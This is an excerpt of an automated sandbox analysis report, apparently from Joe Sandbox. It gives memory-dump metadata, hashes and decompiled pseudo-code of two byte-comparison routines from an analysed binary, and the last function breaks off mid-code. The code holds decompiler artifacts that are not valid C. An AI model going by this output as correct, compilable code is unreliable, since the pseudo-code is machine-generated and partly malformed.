                  • Source File: 00000004.00000002.296876594.002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2c0000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: y`,
                  • API String ID: 0-4081356169
                  • Opcode ID: 3df911d3bb229b9e5b5053eb572e8c057e61aac1366dbd8753bf5e6acc202186
                  • Instruction ID: c5239c7f14ef79e4807467598ba2817cca7f4a7c2390d36f98edcba9a48c3c5e
                  • Opcode Fuzzy Hash: 3df911d3bb229b9e5b5053eb572e8c057e61aac1366dbd8753bf5e6acc202186
                  • Instruction Fuzzy Hash: 0A024330521F618FC736CF29C684A66B7F1BF547207644A2EC6E786E90D272F891CB04
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296876594.002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2c0000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: y`,
                  • API String ID: 0-4081356169
                  • Opcode ID: b96cb0e65caae956d89309612aba2b1de07e8c44b9477945874e0032d935268f
                  • Instruction ID: ee98fcbeda8360b56a79b09779a87b9751831d47992e394cba15cfb9d2706801
                  • Opcode Fuzzy Hash: b96cb0e65caae956d89309612aba2b1de07e8c44b9477945874e0032d935268f
                  • Instruction Fuzzy Hash: 5BA15330520F218FC735CF29CA84A66B7F4BF54720B644A2EC5EB86A90E371F891CB04
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 100%
                  			E0042A547(void* __eax, void* __ecx) {
                  				void* _t196;
                  				signed int _t197;
                  				void* _t200;
                  				signed char _t206;
                  				signed char _t207;
                  				signed char _t208;
                  				signed char _t210;
                  				signed char _t211;
                  				signed int _t216;
                  				signed int _t316;
                  				void* _t319;
                  				void* _t321;
                  				void* _t323;
                  				void* _t325;
                  				void* _t327;
                  				void* _t330;
                  				void* _t332;
                  				void* _t334;
                  				void* _t337;
                  				void* _t339;
                  				void* _t341;
                  				void* _t344;
                  				void* _t346;
                  				void* _t348;
                  				void* _t351;
                  				void* _t353;
                  				void* _t355;
                  				void* _t358;
                  				void* _t360;
                  				void* _t362;
                  
                  				_t200 = __ecx;
                  				_t196 = __eax;
                  				if( *((intOrPtr*)(__eax - 0x1f)) ==  *((intOrPtr*)(__ecx - 0x1f))) {
                  					_t316 = 0;
                  					L17:
                  					if(_t316 != 0) {
                  						goto L1;
                  					}
                  					_t206 =  *(_t196 - 0x1b);
                  					if(_t206 ==  *(_t200 - 0x1b)) {
                  						_t316 = 0;
                  						L28:
                  						if(_t316 != 0) {
                  							goto L1;
                  						}
                  						_t207 =  *(_t196 - 0x17);
                  						if(_t207 ==  *(_t200 - 0x17)) {
                  							_t316 = 0;
                  							L39:
                  							if(_t316 != 0) {
                  								goto L1;
                  							}
                  							_t208 =  *(_t196 - 0x13);
                  							if(_t208 ==  *(_t200 - 0x13)) {
                  								_t316 = 0;
                  								L50:
                  								if(_t316 != 0) {
                  									goto L1;
                  								}
                  								if( *(_t196 - 0xf) ==  *(_t200 - 0xf)) {
                  									_t316 = 0;
                  									L61:
                  									if(_t316 != 0) {
                  										goto L1;
                  									}
                  									_t210 =  *(_t196 - 0xb);
                  									if(_t210 ==  *(_t200 - 0xb)) {
                  										_t316 = 0;
                  										L72:
                  										if(_t316 != 0) {
                  											goto L1;
                  										}
                  										_t211 =  *(_t196 - 7);
                  										if(_t211 ==  *(_t200 - 7)) {
                  											_t316 = 0;
                  											L83:
                  											if(_t316 != 0) {
                  												goto L1;
                  											}
                  											_t319 = ( *(_t196 - 3) & 0x000000ff) - ( *(_t200 - 3) & 0x000000ff);
                  											if(_t319 == 0) {
                  												L5:
                  												_t321 = ( *(_t196 - 2) & 0x000000ff) - ( *(_t200 - 2) & 0x000000ff);
                  												if(_t321 == 0) {
                  													L3:
                  													_t197 = ( *(_t196 - 1) & 0x000000ff) - ( *(_t200 - 1) & 0x000000ff);
                  													if(_t197 != 0) {
                  														_t197 = (0 | _t197 > 0x00000000) + (0 | _t197 > 0x00000000) - 1;
                  													}
                  													L2:
                  													return _t197;
                  												}
                  												_t216 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
                  												if(_t216 != 0) {
                  													L86:
                  													_t197 = _t216;
                  													goto L2;
                  												} else {
                  													goto L3;
                  												}
                  											}
                  											_t216 = (0 | _t319 > 0x00000000) + (0 | _t319 > 0x00000000) - 1;
                  											if(_t216 == 0) {
                  												goto L5;
                  											}
                  											goto L86;
                  										}
                  										_t323 = (_t211 & 0x000000ff) - ( *(_t200 - 7) & 0x000000ff);
                  										if(_t323 == 0) {
                  											L76:
                  											_t325 = ( *(_t196 - 6) & 0x000000ff) - ( *(_t200 - 6) & 0x000000ff);
                  											if(_t325 == 0) {
                  												L78:
                  												_t327 = ( *(_t196 - 5) & 0x000000ff) - ( *(_t200 - 5) & 0x000000ff);
                  												if(_t327 == 0) {
                  													L80:
                  													_t316 = ( *(_t196 - 4) & 0x000000ff) - ( *(_t200 - 4) & 0x000000ff);
                  													if(_t316 != 0) {
                  														_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                  													}
                  													goto L83;
                  												}
                  												_t316 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
                  												if(_t316 != 0) {
                  													goto L1;
                  												}
                  												goto L80;
                  											}
                  											_t316 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
                  											if(_t316 != 0) {
                  												goto L1;
                  											}
                  											goto L78;
                  										}
                  										_t316 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
                  										if(_t316 != 0) {
                  											goto L1;
                  										}
                  										goto L76;
                  									}
                  									_t330 = (_t210 & 0x000000ff) - ( *(_t200 - 0xb) & 0x000000ff);
                  									if(_t330 == 0) {
                  										L65:
                  										_t332 = ( *(_t196 - 0xa) & 0x000000ff) - ( *(_t200 - 0xa) & 0x000000ff);
                  										if(_t332 == 0) {
                  											L67:
                  											_t334 = ( *(_t196 - 9) & 0x000000ff) - ( *(_t200 - 9) & 0x000000ff);
                  											if(_t334 == 0) {
                  												L69:
                  												_t316 = ( *(_t196 - 8) & 0x000000ff) - ( *(_t200 - 8) & 0x000000ff);
                  												if(_t316 != 0) {
                  													_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                  												}
                  												goto L72;
                  											}
                  											_t316 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
                  											if(_t316 != 0) {
                  												goto L1;
                  											}
                  											goto L69;
                  										}
                  										_t316 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
                  										if(_t316 != 0) {
                  											goto L1;
                  										}
                  										goto L67;
                  									}
                  									_t316 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
                  									if(_t316 != 0) {
                  										goto L1;
                  									}
                  									goto L65;
                  								}
                  								_t337 = ( *(_t196 - 0xf) & 0x000000ff) - ( *(_t200 - 0xf) & 0x000000ff);
                  								if(_t337 == 0) {
                  									L54:
                  									_t339 = ( *(_t196 - 0xe) & 0x000000ff) - ( *(_t200 - 0xe) & 0x000000ff);
                  									if(_t339 == 0) {
                  										L56:
                  										_t341 = ( *(_t196 - 0xd) & 0x000000ff) - ( *(_t200 - 0xd) & 0x000000ff);
                  										if(_t341 == 0) {
                  											L58:
                  											_t316 = ( *(_t196 - 0xc) & 0x000000ff) - ( *(_t200 - 0xc) & 0x000000ff);
                  											if(_t316 != 0) {
                  												_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                  											}
                  											goto L61;
                  										}
                  										_t316 = (0 | _t341 > 0x00000000) + (0 | _t341 > 0x00000000) - 1;
                  										if(_t316 != 0) {
                  											goto L1;
                  										}
                  										goto L58;
                  									}
                  									_t316 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
                  									if(_t316 != 0) {
                  										goto L1;
                  									}
                  									goto L56;
                  								}
                  								_t316 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
                  								if(_t316 != 0) {
                  									goto L1;
                  								}
                  								goto L54;
                  							}
                  							_t344 = (_t208 & 0x000000ff) - ( *(_t200 - 0x13) & 0x000000ff);
                  							if(_t344 == 0) {
                  								L43:
                  								_t346 = ( *(_t196 - 0x12) & 0x000000ff) - ( *(_t200 - 0x12) & 0x000000ff);
                  								if(_t346 == 0) {
                  									L45:
                  									_t348 = ( *(_t196 - 0x11) & 0x000000ff) - ( *(_t200 - 0x11) & 0x000000ff);
                  									if(_t348 == 0) {
                  										L47:
                  										_t316 = ( *(_t196 - 0x10) & 0x000000ff) - ( *(_t200 - 0x10) & 0x000000ff);
                  										if(_t316 != 0) {
                  											_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                  										}
                  										goto L50;
                  									}
                  									_t316 = (0 | _t348 > 0x00000000) + (0 | _t348 > 0x00000000) - 1;
                  									if(_t316 != 0) {
                  										goto L1;
                  									}
                  									goto L47;
                  								}
                  								_t316 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
                  								if(_t316 != 0) {
                  									goto L1;
                  								}
                  								goto L45;
                  							}
                  							_t316 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
                  							if(_t316 != 0) {
                  								goto L1;
                  							}
                  							goto L43;
                  						}
                  						_t351 = (_t207 & 0x000000ff) - ( *(_t200 - 0x17) & 0x000000ff);
                  						if(_t351 == 0) {
                  							L32:
                  							_t353 = ( *(_t196 - 0x16) & 0x000000ff) - ( *(_t200 - 0x16) & 0x000000ff);
                  							if(_t353 == 0) {
                  								L34:
                  								_t355 = ( *(_t196 - 0x15) & 0x000000ff) - ( *(_t200 - 0x15) & 0x000000ff);
                  								if(_t355 == 0) {
                  									L36:
                  									_t316 = ( *(_t196 - 0x14) & 0x000000ff) - ( *(_t200 - 0x14) & 0x000000ff);
                  									if(_t316 != 0) {
                  										_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                  									}
                  									goto L39;
                  								}
                  								_t316 = (0 | _t355 > 0x00000000) + (0 | _t355 > 0x00000000) - 1;
                  								if(_t316 != 0) {
                  									goto L1;
                  								}
                  								goto L36;
                  							}
                  							_t316 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
                  							if(_t316 != 0) {
                  								goto L1;
                  							}
                  							goto L34;
                  						}
                  						_t316 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
                  						if(_t316 != 0) {
                  							goto L1;
                  						}
                  						goto L32;
                  					}
                  					_t358 = (_t206 & 0x000000ff) - ( *(_t200 - 0x1b) & 0x000000ff);
                  					if(_t358 == 0) {
                  						L21:
                  						_t360 = ( *(_t196 - 0x1a) & 0x000000ff) - ( *(_t200 - 0x1a) & 0x000000ff);
                  						if(_t360 == 0) {
                  							L23:
                  							_t362 = ( *(_t196 - 0x19) & 0x000000ff) - ( *(_t200 - 0x19) & 0x000000ff);
                  							if(_t362 == 0) {
                  								L25:
                  								_t316 = ( *(_t196 - 0x18) & 0x000000ff) - ( *(_t200 - 0x18) & 0x000000ff);
                  								if(_t316 != 0) {
                  									_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                  								}
                  								goto L28;
                  							}
                  							_t316 = (0 | _t362 > 0x00000000) + (0 | _t362 > 0x00000000) - 1;
                  							if(_t316 != 0) {
                  								goto L1;
                  							}
                  							goto L25;
                  						}
                  						_t316 = (0 | _t360 > 0x00000000) + (0 | _t360 > 0x00000000) - 1;
                  						if(_t316 != 0) {
                  							goto L1;
                  						}
                  						goto L23;
                  					}
                  					_t316 = (0 | _t358 > 0x00000000) + (0 | _t358 > 0x00000000) - 1;
                  					if(_t316 != 0) {
                  						goto L1;
                  					}
                  					goto L21;
                  				} else {
                  					__edx =  *(__ecx - 0x1f) & 0x000000ff;
                  					__esi =  *(__eax - 0x1f) & 0x000000ff;
                  					__esi = ( *(__eax - 0x1f) & 0x000000ff) - ( *(__ecx - 0x1f) & 0x000000ff);
                  					if(__esi == 0) {
                  						L10:
                  						__esi =  *(__eax - 0x1e) & 0x000000ff;
                  						__edx =  *(__ecx - 0x1e) & 0x000000ff;
                  						__esi = ( *(__eax - 0x1e) & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
                  						if(__esi == 0) {
                  							L12:
                  							__esi =  *(__eax - 0x1d) & 0x000000ff;
                  							__edx =  *(__ecx - 0x1d) & 0x000000ff;
                  							__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                  							if(__esi == 0) {
                  								L14:
                  								__esi =  *(__eax - 0x1c) & 0x000000ff;
                  								__edx =  *(__ecx - 0x1c) & 0x000000ff;
                  								__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                  								if(__esi != 0) {
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = (__esi > 0) + (__esi > 0) - 1;
                  								}
                  								goto L17;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L1;
                  							}
                  							goto L14;
                  						}
                  						0 = 0 | __esi > 0x00000000;
                  						__edx = (__esi > 0) + (__esi > 0) - 1;
                  						__esi = __edx;
                  						if(__edx != 0) {
                  							goto L1;
                  						}
                  						goto L12;
                  					}
                  					0 = 0 | __esi > 0x00000000;
                  					__edx = (__esi > 0) + (__esi > 0) - 1;
                  					__esi = __edx;
                  					if(__edx != 0) {
                  						goto L1;
                  					}
                  					goto L10;
                  				}
                  				L1:
                  				_t197 = _t316;
                  				goto L2;
                  			}
                  0x0042a748
                  0x0042a75f
                  0x0042a767
                  0x0042a769
                  0x0042a776
                  0x0042a776
                  0x00000000
                  0x0042a769
                  0x0042a755
                  0x0042a759
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a759
                  0x0042a734
                  0x0042a738
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a738
                  0x0042a713
                  0x0042a717
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a717
                  0x0042a675
                  0x0042a677
                  0x0042a68e
                  0x0042a696
                  0x0042a698
                  0x0042a6af
                  0x0042a6b7
                  0x0042a6b9
                  0x0042a6d0
                  0x0042a6d8
                  0x0042a6da
                  0x0042a6e7
                  0x0042a6e7
                  0x00000000
                  0x0042a6da
                  0x0042a6c6
                  0x0042a6ca
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a6ca
                  0x0042a6a5
                  0x0042a6a9
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a6a9
                  0x0042a684
                  0x0042a688
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a688
                  0x0042a5e6
                  0x0042a5e8
                  0x0042a5ff
                  0x0042a607
                  0x0042a609
                  0x0042a620
                  0x0042a628
                  0x0042a62a
                  0x0042a641
                  0x0042a649
                  0x0042a64b
                  0x0042a658
                  0x0042a658
                  0x00000000
                  0x0042a64b
                  0x0042a637
                  0x0042a63b
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a63b
                  0x0042a616
                  0x0042a61a
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a61a
                  0x0042a5f5
                  0x0042a5f9
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a54f
                  0x0042a54f
                  0x0042a553
                  0x0042a557
                  0x0042a559
                  0x0042a570
                  0x0042a570
                  0x0042a574
                  0x0042a578
                  0x0042a57a
                  0x0042a591
                  0x0042a591
                  0x0042a595
                  0x0042a599
                  0x0042a59b
                  0x0042a5b2
                  0x0042a5b2
                  0x0042a5b6
                  0x0042a5ba
                  0x0042a5bc
                  0x0042a5c2
                  0x0042a5c5
                  0x0042a5c9
                  0x0042a5c9
                  0x00000000
                  0x0042a5bc
                  0x0042a5a1
                  0x0042a5a4
                  0x0042a5a8
                  0x0042a5ac
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a5ac
                  0x0042a580
                  0x0042a583
                  0x0042a587
                  0x0042a58b
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a58b
                  0x0042a55f
                  0x0042a562
                  0x0042a566
                  0x0042a56a
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a56a
                  0x00429940
                  0x00429940
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                  • Instruction ID: e5087697884af4589422f39b7edb5d785bf61ffddb57a6e69f6b75451d5cd98b
                  • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                  • Instruction Fuzzy Hash: 51D1B0B3E0A9B30A8736812D505813BEE626FC176035FC3E6CCD43F389D22A9D6595D4
                  Uniqueness

                  Uniqueness Score: 0.00%

                  C-Code - Quality: 100%
                  			E0042A127(void* __eax, void* __ecx) {
                  				void* _t191;
                  				signed int _t192;
                  				void* _t195;
                  				signed char _t201;
                  				signed char _t202;
                  				signed char _t203;
                  				signed char _t204;
                  				signed char _t206;
                  				signed int _t211;
                  				signed int _t309;
                  				void* _t312;
                  				void* _t314;
                  				void* _t316;
                  				void* _t318;
                  				void* _t321;
                  				void* _t323;
                  				void* _t325;
                  				void* _t328;
                  				void* _t330;
                  				void* _t332;
                  				void* _t335;
                  				void* _t337;
                  				void* _t339;
                  				void* _t342;
                  				void* _t344;
                  				void* _t346;
                  				void* _t349;
                  				void* _t351;
                  				void* _t353;
                  
                  				_t195 = __ecx;
                  				_t191 = __eax;
                  				if( *((intOrPtr*)(__eax - 0x1e)) ==  *((intOrPtr*)(__ecx - 0x1e))) {
                  					_t309 = 0;
                  					L15:
                  					if(_t309 != 0) {
                  						goto L1;
                  					}
                  					_t201 =  *(_t191 - 0x1a);
                  					if(_t201 ==  *(_t195 - 0x1a)) {
                  						_t309 = 0;
                  						L26:
                  						if(_t309 != 0) {
                  							goto L1;
                  						}
                  						_t202 =  *(_t191 - 0x16);
                  						if(_t202 ==  *(_t195 - 0x16)) {
                  							_t309 = 0;
                  							L37:
                  							if(_t309 != 0) {
                  								goto L1;
                  							}
                  							_t203 =  *(_t191 - 0x12);
                  							if(_t203 ==  *(_t195 - 0x12)) {
                  								_t309 = 0;
                  								L48:
                  								if(_t309 != 0) {
                  									goto L1;
                  								}
                  								_t204 =  *(_t191 - 0xe);
                  								if(_t204 ==  *(_t195 - 0xe)) {
                  									_t309 = 0;
                  									L59:
                  									if(_t309 != 0) {
                  										goto L1;
                  									}
                  									if( *(_t191 - 0xa) ==  *(_t195 - 0xa)) {
                  										_t309 = 0;
                  										L70:
                  										if(_t309 != 0) {
                  											goto L1;
                  										}
                  										_t206 =  *(_t191 - 6);
                  										if(_t206 ==  *(_t195 - 6)) {
                  											_t309 = 0;
                  											L81:
                  											if(_t309 != 0) {
                  												goto L1;
                  											}
                  											if( *(_t191 - 2) ==  *(_t195 - 2)) {
                  												_t192 = 0;
                  												L3:
                  												return _t192;
                  											}
                  											_t312 = ( *(_t191 - 2) & 0x000000ff) - ( *(_t195 - 2) & 0x000000ff);
                  											if(_t312 == 0) {
                  												L4:
                  												_t192 = ( *(_t191 - 1) & 0x000000ff) - ( *(_t195 - 1) & 0x000000ff);
                  												if(_t192 != 0) {
                  													_t192 = (0 | _t192 > 0x00000000) + (0 | _t192 > 0x00000000) - 1;
                  												}
                  												goto L3;
                  											}
                  											_t211 = (0 | _t312 > 0x00000000) + (0 | _t312 > 0x00000000) - 1;
                  											if(_t211 != 0) {
                  												_t192 = _t211;
                  												goto L3;
                  											}
                  											goto L4;
                  										}
                  										_t314 = (_t206 & 0x000000ff) - ( *(_t195 - 6) & 0x000000ff);
                  										if(_t314 == 0) {
                  											L74:
                  											_t316 = ( *(_t191 - 5) & 0x000000ff) - ( *(_t195 - 5) & 0x000000ff);
                  											if(_t316 == 0) {
                  												L76:
                  												_t318 = ( *(_t191 - 4) & 0x000000ff) - ( *(_t195 - 4) & 0x000000ff);
                  												if(_t318 == 0) {
                  													L78:
                  													_t309 = ( *(_t191 - 3) & 0x000000ff) - ( *(_t195 - 3) & 0x000000ff);
                  													if(_t309 != 0) {
                  														_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                  													}
                  													goto L81;
                  												}
                  												_t309 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
                  												if(_t309 != 0) {
                  													goto L1;
                  												}
                  												goto L78;
                  											}
                  											_t309 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                  											if(_t309 != 0) {
                  												goto L1;
                  											}
                  											goto L76;
                  										}
                  										_t309 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
                  										if(_t309 != 0) {
                  											goto L1;
                  										}
                  										goto L74;
                  									}
                  									_t321 = ( *(_t191 - 0xa) & 0x000000ff) - ( *(_t195 - 0xa) & 0x000000ff);
                  									if(_t321 == 0) {
                  										L63:
                  										_t323 = ( *(_t191 - 9) & 0x000000ff) - ( *(_t195 - 9) & 0x000000ff);
                  										if(_t323 == 0) {
                  											L65:
                  											_t325 = ( *(_t191 - 8) & 0x000000ff) - ( *(_t195 - 8) & 0x000000ff);
                  											if(_t325 == 0) {
                  												L67:
                  												_t309 = ( *(_t191 - 7) & 0x000000ff) - ( *(_t195 - 7) & 0x000000ff);
                  												if(_t309 != 0) {
                  													_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                  												}
                  												goto L70;
                  											}
                  											_t309 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
                  											if(_t309 != 0) {
                  												goto L1;
                  											}
                  											goto L67;
                  										}
                  										_t309 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
                  										if(_t309 != 0) {
                  											goto L1;
                  										}
                  										goto L65;
                  									}
                  									_t309 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
                  									if(_t309 != 0) {
                  										goto L1;
                  									}
                  									goto L63;
                  								}
                  								_t328 = (_t204 & 0x000000ff) - ( *(_t195 - 0xe) & 0x000000ff);
                  								if(_t328 == 0) {
                  									L52:
                  									_t330 = ( *(_t191 - 0xd) & 0x000000ff) - ( *(_t195 - 0xd) & 0x000000ff);
                  									if(_t330 == 0) {
                  										L54:
                  										_t332 = ( *(_t191 - 0xc) & 0x000000ff) - ( *(_t195 - 0xc) & 0x000000ff);
                  										if(_t332 == 0) {
                  											L56:
                  											_t309 = ( *(_t191 - 0xb) & 0x000000ff) - ( *(_t195 - 0xb) & 0x000000ff);
                  											if(_t309 != 0) {
                  												_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                  											}
                  											goto L59;
                  										}
                  										_t309 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
                  										if(_t309 != 0) {
                  											goto L1;
                  										}
                  										goto L56;
                  									}
                  									_t309 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
                  									if(_t309 != 0) {
                  										goto L1;
                  									}
                  									goto L54;
                  								}
                  								_t309 = (0 | _t328 > 0x00000000) + (0 | _t328 > 0x00000000) - 1;
                  								if(_t309 != 0) {
                  									goto L1;
                  								}
                  								goto L52;
                  							}
                  							_t335 = (_t203 & 0x000000ff) - ( *(_t195 - 0x12) & 0x000000ff);
                  							if(_t335 == 0) {
                  								L41:
                  								_t337 = ( *(_t191 - 0x11) & 0x000000ff) - ( *(_t195 - 0x11) & 0x000000ff);
                  								if(_t337 == 0) {
                  									L43:
                  									_t339 = ( *(_t191 - 0x10) & 0x000000ff) - ( *(_t195 - 0x10) & 0x000000ff);
                  									if(_t339 == 0) {
                  										L45:
                  										_t309 = ( *(_t191 - 0xf) & 0x000000ff) - ( *(_t195 - 0xf) & 0x000000ff);
                  										if(_t309 != 0) {
                  											_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                  										}
                  										goto L48;
                  									}
                  									_t309 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
                  									if(_t309 != 0) {
                  										goto L1;
                  									}
                  									goto L45;
                  								}
                  								_t309 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
                  								if(_t309 != 0) {
                  									goto L1;
                  								}
                  								goto L43;
                  							}
                  							_t309 = (0 | _t335 > 0x00000000) + (0 | _t335 > 0x00000000) - 1;
                  							if(_t309 != 0) {
                  								goto L1;
                  							}
                  							goto L41;
                  						}
                  						_t342 = (_t202 & 0x000000ff) - ( *(_t195 - 0x16) & 0x000000ff);
                  						if(_t342 == 0) {
                  							L30:
                  							_t344 = ( *(_t191 - 0x15) & 0x000000ff) - ( *(_t195 - 0x15) & 0x000000ff);
                  							if(_t344 == 0) {
                  								L32:
                  								_t346 = ( *(_t191 - 0x14) & 0x000000ff) - ( *(_t195 - 0x14) & 0x000000ff);
                  								if(_t346 == 0) {
                  									L34:
                  									_t309 = ( *(_t191 - 0x13) & 0x000000ff) - ( *(_t195 - 0x13) & 0x000000ff);
                  									if(_t309 != 0) {
                  										_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                  									}
                  									goto L37;
                  								}
                  								_t309 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
                  								if(_t309 != 0) {
                  									goto L1;
                  								}
                  								goto L34;
                  							}
                  							_t309 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
                  							if(_t309 != 0) {
                  								goto L1;
                  							}
                  							goto L32;
                  						}
                  						_t309 = (0 | _t342 > 0x00000000) + (0 | _t342 > 0x00000000) - 1;
                  						if(_t309 != 0) {
                  							goto L1;
                  						}
                  						goto L30;
                  					}
                  					_t349 = (_t201 & 0x000000ff) - ( *(_t195 - 0x1a) & 0x000000ff);
                  					if(_t349 == 0) {
                  						L19:
                  						_t351 = ( *(_t191 - 0x19) & 0x000000ff) - ( *(_t195 - 0x19) & 0x000000ff);
                  						if(_t351 == 0) {
                  							L21:
                  							_t353 = ( *(_t191 - 0x18) & 0x000000ff) - ( *(_t195 - 0x18) & 0x000000ff);
                  							if(_t353 == 0) {
                  								L23:
                  								_t309 = ( *(_t191 - 0x17) & 0x000000ff) - ( *(_t195 - 0x17) & 0x000000ff);
                  								if(_t309 != 0) {
                  									_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                  								}
                  								goto L26;
                  							}
                  							_t309 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
                  							if(_t309 != 0) {
                  								goto L1;
                  							}
                  							goto L23;
                  						}
                  						_t309 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
                  						if(_t309 != 0) {
                  							goto L1;
                  						}
                  						goto L21;
                  					}
                  					_t309 = (0 | _t349 > 0x00000000) + (0 | _t349 > 0x00000000) - 1;
                  					if(_t309 != 0) {
                  						goto L1;
                  					}
                  					goto L19;
                  				} else {
                  					__esi = __dl & 0x000000ff;
                  					__edx =  *(__ecx - 0x1e) & 0x000000ff;
                  					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
                  					if(__esi == 0) {
                  						L8:
                  						__esi =  *(__eax - 0x1d) & 0x000000ff;
                  						__edx =  *(__ecx - 0x1d) & 0x000000ff;
                  						__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                  						if(__esi == 0) {
                  							L10:
                  							__esi =  *(__eax - 0x1c) & 0x000000ff;
                  							__edx =  *(__ecx - 0x1c) & 0x000000ff;
                  							__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                  							if(__esi == 0) {
                  								L12:
                  								__esi =  *(__eax - 0x1b) & 0x000000ff;
                  								__edx =  *(__ecx - 0x1b) & 0x000000ff;
                  								__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                  								if(__esi != 0) {
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = (__esi > 0) + (__esi > 0) - 1;
                  								}
                  								goto L15;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L1;
                  							}
                  							goto L12;
                  						}
                  						0 = 0 | __esi > 0x00000000;
                  						__edx = (__esi > 0) + (__esi > 0) - 1;
                  						__esi = __edx;
                  						if(__edx != 0) {
